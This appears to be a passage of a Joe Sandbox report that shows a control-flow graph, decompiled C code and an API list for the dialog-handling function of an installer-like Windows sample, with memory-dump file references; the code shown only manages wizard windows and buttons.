                                                                                                                                                                            • Instruction ID: 0f8f367329741da9f462fb95088ad90eb461480f9ef8d7537f1d0d3e310fb038
                                                                                                                                                                            • Opcode Fuzzy Hash: f900e8a11cc8a1bc9f191a555d38eca2351d5c3f9b070b8337c4e9507668bb61
                                                                                                                                                                            • Instruction Fuzzy Hash: F541DF342047599FDB30AF28DDA87DA77E5EF562A0F95422DDCC9DB640D3309682CB06
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 250 403a0b-403a1d 251 403a23-403a29 250->251 252 403b5e-403b6d 250->252 251->252 253 403a2f-403a38 251->253 254 403bbc-403bd1 252->254 255 403b6f-403bb7 GetDlgItem * 2 call 403ede SetClassLongA call 40140b 252->255 258 403a3a-403a47 SetWindowPos 253->258 259 403a4d-403a50 253->259 256 403c11-403c16 call 403f2a 254->256 257 403bd3-403bd6 254->257 255->254 269 403c1b-403c36 256->269 261 403bd8-403be3 call 401389 257->261 262 403c09-403c0b 257->262 258->259 264 403a52-403a64 ShowWindow 259->264 265 403a6a-403a70 259->265 261->262 283 403be5-403c04 SendMessageA 261->283 262->256 268 403eab 262->268 264->265 270 403a72-403a87 DestroyWindow 265->270 271 403a8c-403a8f 265->271 276 403ead-403eb4 268->276 274 403c38-403c3a call 40140b 269->274 275 403c3f-403c45 269->275 277 403e88-403e8e 270->277 279 403a91-403a9d SetWindowLongA 271->279 280 403aa2-403aa8 271->280 274->275 286 403e69-403e82 DestroyWindow EndDialog 275->286 287 403c4b-403c56 275->287 277->268 284 403e90-403e96 277->284 279->276 281 403b4b-403b59 call 403f45 280->281 282 403aae-403abf GetDlgItem 280->282 281->276 288 403ac1-403ad8 SendMessageA IsWindowEnabled 282->288 289 403ade-403ae1 282->289 283->276 284->268 291 403e98-403ea1 ShowWindow 284->291 286->277 287->286 292 403c5c-403ca9 call 405d1b call 403ede * 3 GetDlgItem 287->292 288->268 288->289 293 403ae3-403ae4 289->293 294 403ae6-403ae9 289->294 291->268 320 403cb3-403cef ShowWindow KiUserCallbackDispatcher call 403f00 EnableWindow 292->320 321 403cab-403cb0 292->321 297 403b14-403b19 call 403eb7 293->297 298 403af7-403afc 294->298 299 403aeb-403af1 294->299 297->281 302 403b32-403b45 SendMessageA 298->302 304 403afe-403b04 298->304 299->302 303 403af3-403af5 299->303 302->281 303->297 308 403b06-403b0c call 40140b 304->308 309 403b1b-403b24 call 40140b 304->309 318 403b12 308->318 309->281 317 403b26-403b30 309->317 317->318 318->297 324 403cf1-403cf2 320->324 325 403cf4 320->325 321->320 326 403cf6-403d24 GetSystemMenu EnableMenuItem SendMessageA 324->326 325->326 327 403d26-403d37 SendMessageA 326->327 328 403d39 326->328 329 403d3f-403d78 call 403f13 call 405cf9 lstrlenA call 405d1b SetWindowTextA call 401389 327->329 328->329 329->269 338 403d7e-403d80 329->338 338->269 339 403d86-403d8a 338->339 340 403da9-403dbd DestroyWindow 339->340 341 403d8c-403d92 339->341 340->277 343 403dc3-403df0 CreateDialogParamA 340->343 341->268 342 403d98-403d9e 341->342 342->269 344 403da4 342->344 343->277 345 403df6-403e4d call 403ede GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 343->345 344->268 345->268 350 403e4f-403e67 ShowWindow call 403f2a 345->350 350->277
                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E00403A0B(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                                                                                            				struct HWND__* _v32;
                                                                                                                                                                            				void* _v84;
                                                                                                                                                                            				void* _v88;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                            				struct HWND__* _t49;
                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                            				struct HWND__* _t73;
                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                            				struct HWND__* _t91;
                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                            				int _t103;
                                                                                                                                                                            				signed int _t115;
                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                            				int _t117;
                                                                                                                                                                            				signed int _t122;
                                                                                                                                                                            				struct HWND__* _t125;
                                                                                                                                                                            				struct HWND__* _t126;
                                                                                                                                                                            				int _t127;
                                                                                                                                                                            				long _t130;
                                                                                                                                                                            				int _t132;
                                                                                                                                                                            				int _t133;
                                                                                                                                                                            				void* _t134;
                                                                                                                                                                            				void* _t142;
                                                                                                                                                                            
                                                                                                                                                                            				_t115 = _a8;
                                                                                                                                                                            				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                                                                                                            					_t35 = _a12;
                                                                                                                                                                            					_t125 = _a4;
                                                                                                                                                                            					__eflags = _t115 - 0x110;
                                                                                                                                                                            					 *0x41fcf0 = _t35;
                                                                                                                                                                            					if(_t115 == 0x110) {
                                                                                                                                                                            						 *0x423708 = _t125;
                                                                                                                                                                            						 *0x41fd04 = GetDlgItem(_t125, 1);
                                                                                                                                                                            						_t91 = GetDlgItem(_t125, 2);
                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                            						_push(0x1c);
                                                                                                                                                                            						 *0x41ecd0 = _t91;
                                                                                                                                                                            						E00403EDE(_t125);
                                                                                                                                                                            						SetClassLongA(_t125, 0xfffffff2,  *0x422ee8);
                                                                                                                                                                            						 *0x422ecc = E0040140B(4);
                                                                                                                                                                            						_t35 = 1;
                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                            						 *0x41fcf0 = 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t122 =  *0x4091dc; // 0x0
                                                                                                                                                                            					_t133 = 0;
                                                                                                                                                                            					_t130 = (_t122 << 6) +  *0x423720;
                                                                                                                                                                            					__eflags = _t122;
                                                                                                                                                                            					if(_t122 < 0) {
                                                                                                                                                                            						L34:
                                                                                                                                                                            						E00403F2A(0x40b);
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							_t37 =  *0x41fcf0;
                                                                                                                                                                            							 *0x4091dc =  *0x4091dc + _t37;
                                                                                                                                                                            							_t130 = _t130 + (_t37 << 6);
                                                                                                                                                                            							_t39 =  *0x4091dc; // 0x0
                                                                                                                                                                            							__eflags = _t39 -  *0x423724;
                                                                                                                                                                            							if(_t39 ==  *0x423724) {
                                                                                                                                                                            								E0040140B(1);
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *0x422ecc - _t133; // 0x0
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *0x4091dc -  *0x423724; // 0x0
                                                                                                                                                                            							if(__eflags >= 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t116 =  *(_t130 + 0x14);
                                                                                                                                                                            							E00405D1B(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                                                                                                            							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                                                                                                            							_push(0xfffffc19);
                                                                                                                                                                            							E00403EDE(_t125);
                                                                                                                                                                            							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                                                                                                            							_push(0xfffffc1b);
                                                                                                                                                                            							E00403EDE(_t125);
                                                                                                                                                                            							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                                                                                                            							_push(0xfffffc1a);
                                                                                                                                                                            							E00403EDE(_t125);
                                                                                                                                                                            							_t49 = GetDlgItem(_t125, 3);
                                                                                                                                                                            							__eflags =  *0x42378c - _t133;
                                                                                                                                                                            							_v32 = _t49;
                                                                                                                                                                            							if( *0x42378c != _t133) {
                                                                                                                                                                            								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                                                                                                            								__eflags = _t116;
                                                                                                                                                                            							}
                                                                                                                                                                            							ShowWindow(_t49, _t116 & 0x00000008); // executed
                                                                                                                                                                            							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
                                                                                                                                                                            							E00403F00(_t116 & 0x00000002);
                                                                                                                                                                            							_t117 = _t116 & 0x00000004;
                                                                                                                                                                            							EnableWindow( *0x41ecd0, _t117);
                                                                                                                                                                            							__eflags = _t117 - _t133;
                                                                                                                                                                            							if(_t117 == _t133) {
                                                                                                                                                                            								_push(1);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_push(_t133);
                                                                                                                                                                            							}
                                                                                                                                                                            							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                                                                                                            							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                                                                                                                            							__eflags =  *0x42378c - _t133;
                                                                                                                                                                            							if( *0x42378c == _t133) {
                                                                                                                                                                            								_push( *0x41fd04);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                                                                                                            								_push( *0x41ecd0);
                                                                                                                                                                            							}
                                                                                                                                                                            							E00403F13();
                                                                                                                                                                            							E00405CF9(0x41fd08, 0x422f00);
                                                                                                                                                                            							E00405D1B(0x41fd08, _t125, _t130,  &(0x41fd08[lstrlenA(0x41fd08)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                                                                                                            							SetWindowTextA(_t125, 0x41fd08); // executed
                                                                                                                                                                            							_push(_t133);
                                                                                                                                                                            							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                                                                                                            							__eflags = _t67;
                                                                                                                                                                            							if(_t67 != 0) {
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags =  *_t130 - _t133;
                                                                                                                                                                            								if( *_t130 == _t133) {
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags =  *(_t130 + 4) - 5;
                                                                                                                                                                            								if( *(_t130 + 4) != 5) {
                                                                                                                                                                            									DestroyWindow( *0x422ed8); // executed
                                                                                                                                                                            									 *0x41f4e0 = _t130;
                                                                                                                                                                            									__eflags =  *_t130 - _t133;
                                                                                                                                                                            									if( *_t130 <= _t133) {
                                                                                                                                                                            										goto L58;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t73 = CreateDialogParamA( *0x423700,  *_t130 +  *0x422ee0 & 0x0000ffff, _t125,  *( *(_t130 + 4) * 4 + "\'@@"), _t130); // executed
                                                                                                                                                                            									__eflags = _t73 - _t133;
                                                                                                                                                                            									 *0x422ed8 = _t73;
                                                                                                                                                                            									if(_t73 == _t133) {
                                                                                                                                                                            										goto L58;
                                                                                                                                                                            									}
                                                                                                                                                                            									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                                                                                                            									_push(6);
                                                                                                                                                                            									E00403EDE(_t73);
                                                                                                                                                                            									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                                                                                                            									ScreenToClient(_t125, _t134 + 0x10);
                                                                                                                                                                            									SetWindowPos( *0x422ed8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                                                                                                            									_push(_t133);
                                                                                                                                                                            									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                                                                                                            									__eflags =  *0x422ecc - _t133; // 0x0
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										goto L61;
                                                                                                                                                                            									}
                                                                                                                                                                            									ShowWindow( *0x422ed8, 8);
                                                                                                                                                                            									E00403F2A(0x405);
                                                                                                                                                                            									goto L58;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags =  *0x42378c - _t133;
                                                                                                                                                                            								if( *0x42378c != _t133) {
                                                                                                                                                                            									goto L61;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags =  *0x423780 - _t133;
                                                                                                                                                                            								if( *0x423780 != _t133) {
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L61;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						DestroyWindow( *0x422ed8);
                                                                                                                                                                            						 *0x423708 = _t133;
                                                                                                                                                                            						EndDialog(_t125,  *0x41f0d8);
                                                                                                                                                                            						goto L58;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags = _t35 - 1;
                                                                                                                                                                            						if(_t35 != 1) {
                                                                                                                                                                            							L33:
                                                                                                                                                                            							__eflags =  *_t130 - _t133;
                                                                                                                                                                            							if( *_t130 == _t133) {
                                                                                                                                                                            								goto L61;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L34;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                                                                                                                            						__eflags = _t86;
                                                                                                                                                                            						if(_t86 == 0) {
                                                                                                                                                                            							goto L33;
                                                                                                                                                                            						}
                                                                                                                                                                            						SendMessageA( *0x422ed8, 0x40f, 0, 1);
                                                                                                                                                                            						__eflags =  *0x422ecc - _t133; // 0x0
                                                                                                                                                                            						return 0 | __eflags == 0x00000000;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t125 = _a4;
                                                                                                                                                                            					_t133 = 0;
                                                                                                                                                                            					if(_t115 == 0x47) {
                                                                                                                                                                            						SetWindowPos( *0x41fce8, _t125, 0, 0, 0, 0, 0x13);
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t115 == 5) {
                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                            						ShowWindow( *0x41fce8,  ~(_a12 - 1) & _t115);
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t115 != 0x40d) {
                                                                                                                                                                            						__eflags = _t115 - 0x11;
                                                                                                                                                                            						if(_t115 != 0x11) {
                                                                                                                                                                            							__eflags = _t115 - 0x111;
                                                                                                                                                                            							if(_t115 != 0x111) {
                                                                                                                                                                            								L26:
                                                                                                                                                                            								return E00403F45(_t115, _a12, _a16);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t132 = _a12 & 0x0000ffff;
                                                                                                                                                                            							_t126 = GetDlgItem(_t125, _t132);
                                                                                                                                                                            							__eflags = _t126 - _t133;
                                                                                                                                                                            							if(_t126 == _t133) {
                                                                                                                                                                            								L13:
                                                                                                                                                                            								__eflags = _t132 - 1;
                                                                                                                                                                            								if(_t132 != 1) {
                                                                                                                                                                            									__eflags = _t132 - 3;
                                                                                                                                                                            									if(_t132 != 3) {
                                                                                                                                                                            										_t127 = 2;
                                                                                                                                                                            										__eflags = _t132 - _t127;
                                                                                                                                                                            										if(_t132 != _t127) {
                                                                                                                                                                            											L25:
                                                                                                                                                                            											SendMessageA( *0x422ed8, 0x111, _a12, _a16);
                                                                                                                                                                            											goto L26;
                                                                                                                                                                            										}
                                                                                                                                                                            										__eflags =  *0x42378c - _t133;
                                                                                                                                                                            										if( *0x42378c == _t133) {
                                                                                                                                                                            											_t99 = E0040140B(3);
                                                                                                                                                                            											__eflags = _t99;
                                                                                                                                                                            											if(_t99 != 0) {
                                                                                                                                                                            												goto L26;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *0x41f0d8 = 1;
                                                                                                                                                                            											L21:
                                                                                                                                                                            											_push(0x78);
                                                                                                                                                                            											L22:
                                                                                                                                                                            											E00403EB7();
                                                                                                                                                                            											goto L26;
                                                                                                                                                                            										}
                                                                                                                                                                            										E0040140B(_t127);
                                                                                                                                                                            										 *0x41f0d8 = _t127;
                                                                                                                                                                            										goto L21;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *0x4091dc - _t133; // 0x0
                                                                                                                                                                            									if(__eflags <= 0) {
                                                                                                                                                                            										goto L25;
                                                                                                                                                                            									}
                                                                                                                                                                            									_push(0xffffffff);
                                                                                                                                                                            									goto L22;
                                                                                                                                                                            								}
                                                                                                                                                                            								_push(_t132);
                                                                                                                                                                            								goto L22;
                                                                                                                                                                            							}
                                                                                                                                                                            							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                                                                                                                                            							_t103 = IsWindowEnabled(_t126);
                                                                                                                                                                            							__eflags = _t103;
                                                                                                                                                                            							if(_t103 == 0) {
                                                                                                                                                                            								goto L61;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L13;
                                                                                                                                                                            						}
                                                                                                                                                                            						SetWindowLongA(_t125, _t133, _t133);
                                                                                                                                                                            						return 1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						DestroyWindow( *0x422ed8);
                                                                                                                                                                            						 *0x422ed8 = _a12;
                                                                                                                                                                            						L58:
                                                                                                                                                                            						if( *0x420d08 == _t133) {
                                                                                                                                                                            							_t142 =  *0x422ed8 - _t133; // 0x0
                                                                                                                                                                            							if(_t142 != 0) {
                                                                                                                                                                            								ShowWindow(_t125, 0xa);
                                                                                                                                                                            								 *0x420d08 = 1;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L61:
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}































                                                                                                                                                                            0x00403a14
                                                                                                                                                                            0x00403a1d
                                                                                                                                                                            0x00403b5e
                                                                                                                                                                            0x00403b62
                                                                                                                                                                            0x00403b66
                                                                                                                                                                            0x00403b68
                                                                                                                                                                            0x00403b6d
                                                                                                                                                                            0x00403b78
                                                                                                                                                                            0x00403b83
                                                                                                                                                                            0x00403b88
                                                                                                                                                                            0x00403b8a
                                                                                                                                                                            0x00403b8c
                                                                                                                                                                            0x00403b8f
                                                                                                                                                                            0x00403b94
                                                                                                                                                                            0x00403ba2
                                                                                                                                                                            0x00403baf
                                                                                                                                                                            0x00403bb6
                                                                                                                                                                            0x00403bb6
                                                                                                                                                                            0x00403bb7
                                                                                                                                                                            0x00403bb7
                                                                                                                                                                            0x00403bbc
                                                                                                                                                                            0x00403bc2
                                                                                                                                                                            0x00403bc9
                                                                                                                                                                            0x00403bcf
                                                                                                                                                                            0x00403bd1
                                                                                                                                                                            0x00403c11
                                                                                                                                                                            0x00403c16
                                                                                                                                                                            0x00403c1b
                                                                                                                                                                            0x00403c1b
                                                                                                                                                                            0x00403c20
                                                                                                                                                                            0x00403c29
                                                                                                                                                                            0x00403c2b
                                                                                                                                                                            0x00403c30
                                                                                                                                                                            0x00403c36
                                                                                                                                                                            0x00403c3a
                                                                                                                                                                            0x00403c3a
                                                                                                                                                                            0x00403c3f
                                                                                                                                                                            0x00403c45
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403c50
                                                                                                                                                                            0x00403c56
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403c5f
                                                                                                                                                                            0x00403c67
                                                                                                                                                                            0x00403c6c
                                                                                                                                                                            0x00403c6f
                                                                                                                                                                            0x00403c75
                                                                                                                                                                            0x00403c7a
                                                                                                                                                                            0x00403c7d
                                                                                                                                                                            0x00403c83
                                                                                                                                                                            0x00403c88
                                                                                                                                                                            0x00403c8b
                                                                                                                                                                            0x00403c91
                                                                                                                                                                            0x00403c99
                                                                                                                                                                            0x00403c9f
                                                                                                                                                                            0x00403ca5
                                                                                                                                                                            0x00403ca9
                                                                                                                                                                            0x00403cb0
                                                                                                                                                                            0x00403cb0
                                                                                                                                                                            0x00403cb0
                                                                                                                                                                            0x00403cba
                                                                                                                                                                            0x00403ccc
                                                                                                                                                                            0x00403cd8
                                                                                                                                                                            0x00403cdd
                                                                                                                                                                            0x00403ce7
                                                                                                                                                                            0x00403ced
                                                                                                                                                                            0x00403cef
                                                                                                                                                                            0x00403cf4
                                                                                                                                                                            0x00403cf1
                                                                                                                                                                            0x00403cf1
                                                                                                                                                                            0x00403cf1
                                                                                                                                                                            0x00403d04
                                                                                                                                                                            0x00403d1c
                                                                                                                                                                            0x00403d1e
                                                                                                                                                                            0x00403d24
                                                                                                                                                                            0x00403d39
                                                                                                                                                                            0x00403d26
                                                                                                                                                                            0x00403d2f
                                                                                                                                                                            0x00403d31
                                                                                                                                                                            0x00403d31
                                                                                                                                                                            0x00403d3f
                                                                                                                                                                            0x00403d4f
                                                                                                                                                                            0x00403d60
                                                                                                                                                                            0x00403d67
                                                                                                                                                                            0x00403d6d
                                                                                                                                                                            0x00403d71
                                                                                                                                                                            0x00403d76
                                                                                                                                                                            0x00403d78
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403d7e
                                                                                                                                                                            0x00403d7e
                                                                                                                                                                            0x00403d80
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403d86
                                                                                                                                                                            0x00403d8a
                                                                                                                                                                            0x00403daf
                                                                                                                                                                            0x00403db5
                                                                                                                                                                            0x00403dbb
                                                                                                                                                                            0x00403dbd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403de3
                                                                                                                                                                            0x00403de9
                                                                                                                                                                            0x00403deb
                                                                                                                                                                            0x00403df0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403df6
                                                                                                                                                                            0x00403df9
                                                                                                                                                                            0x00403dfc
                                                                                                                                                                            0x00403e13
                                                                                                                                                                            0x00403e1f
                                                                                                                                                                            0x00403e38
                                                                                                                                                                            0x00403e3e
                                                                                                                                                                            0x00403e42
                                                                                                                                                                            0x00403e47
                                                                                                                                                                            0x00403e4d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403e57
                                                                                                                                                                            0x00403e62
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403e62
                                                                                                                                                                            0x00403d8c
                                                                                                                                                                            0x00403d92
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403d98
                                                                                                                                                                            0x00403d9e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403da4
                                                                                                                                                                            0x00403d78
                                                                                                                                                                            0x00403e6f
                                                                                                                                                                            0x00403e7b
                                                                                                                                                                            0x00403e82
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403bd3
                                                                                                                                                                            0x00403bd3
                                                                                                                                                                            0x00403bd6
                                                                                                                                                                            0x00403c09
                                                                                                                                                                            0x00403c09
                                                                                                                                                                            0x00403c0b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403c0b
                                                                                                                                                                            0x00403bd8
                                                                                                                                                                            0x00403bdc
                                                                                                                                                                            0x00403be1
                                                                                                                                                                            0x00403be3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403bf3
                                                                                                                                                                            0x00403bfb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403c01
                                                                                                                                                                            0x00403a2f
                                                                                                                                                                            0x00403a2f
                                                                                                                                                                            0x00403a33
                                                                                                                                                                            0x00403a38
                                                                                                                                                                            0x00403a47
                                                                                                                                                                            0x00403a47
                                                                                                                                                                            0x00403a50
                                                                                                                                                                            0x00403a59
                                                                                                                                                                            0x00403a64
                                                                                                                                                                            0x00403a64
                                                                                                                                                                            0x00403a70
                                                                                                                                                                            0x00403a8c
                                                                                                                                                                            0x00403a8f
                                                                                                                                                                            0x00403aa2
                                                                                                                                                                            0x00403aa8
                                                                                                                                                                            0x00403b4b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403b54
                                                                                                                                                                            0x00403aae
                                                                                                                                                                            0x00403abb
                                                                                                                                                                            0x00403abd
                                                                                                                                                                            0x00403abf
                                                                                                                                                                            0x00403ade
                                                                                                                                                                            0x00403ade
                                                                                                                                                                            0x00403ae1
                                                                                                                                                                            0x00403ae6
                                                                                                                                                                            0x00403ae9
                                                                                                                                                                            0x00403af9
                                                                                                                                                                            0x00403afa
                                                                                                                                                                            0x00403afc
                                                                                                                                                                            0x00403b32
                                                                                                                                                                            0x00403b45
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403b45
                                                                                                                                                                            0x00403afe
                                                                                                                                                                            0x00403b04
                                                                                                                                                                            0x00403b1d
                                                                                                                                                                            0x00403b22
                                                                                                                                                                            0x00403b24
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403b26
                                                                                                                                                                            0x00403b12
                                                                                                                                                                            0x00403b12
                                                                                                                                                                            0x00403b14
                                                                                                                                                                            0x00403b14
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403b14
                                                                                                                                                                            0x00403b07
                                                                                                                                                                            0x00403b0c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403b0c
                                                                                                                                                                            0x00403aeb
                                                                                                                                                                            0x00403af1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403af3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403af3
                                                                                                                                                                            0x00403ae3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403ae3
                                                                                                                                                                            0x00403ac9
                                                                                                                                                                            0x00403ad0
                                                                                                                                                                            0x00403ad6
                                                                                                                                                                            0x00403ad8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403ad8
                                                                                                                                                                            0x00403a94
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403a72
                                                                                                                                                                            0x00403a78
                                                                                                                                                                            0x00403a82
                                                                                                                                                                            0x00403e88
                                                                                                                                                                            0x00403e8e
                                                                                                                                                                            0x00403e90
                                                                                                                                                                            0x00403e96
                                                                                                                                                                            0x00403e9b
                                                                                                                                                                            0x00403ea1
                                                                                                                                                                            0x00403ea1
                                                                                                                                                                            0x00403e96
                                                                                                                                                                            0x00403eab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403eab
                                                                                                                                                                            0x00403a70

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A47
                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00403A64
                                                                                                                                                                            • DestroyWindow.USER32 ref: 00403A78
                                                                                                                                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A94
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403AB5
                                                                                                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AC9
                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403AD0
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403B7E
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403B88
                                                                                                                                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403BA2
                                                                                                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403BF3
                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403C99
                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403CBA
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CCC
                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00403CE7
                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CFD
                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403D04
                                                                                                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D1C
                                                                                                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D2F
                                                                                                                                                                            • lstrlenA.KERNEL32(0041FD08,?,0041FD08,00422F00), ref: 00403D58
                                                                                                                                                                            • SetWindowTextA.USER32(?,0041FD08), ref: 00403D67
                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403E9B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
